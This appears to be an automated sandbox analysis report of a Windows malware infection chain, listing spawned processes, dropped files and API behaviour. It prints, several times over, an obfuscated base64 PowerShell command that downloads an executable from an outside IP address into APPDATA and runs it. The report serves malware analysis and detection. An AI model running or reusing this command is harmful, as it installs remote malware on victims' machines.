                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Suspicious command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B4B37 LoadLibraryA,GetProcAddress,6_2_001B4B37
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D8945 push ecx; ret 6_2_001D8958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csoss.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_001B48D7
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00235376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00235376
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_001D3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_001D3187
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
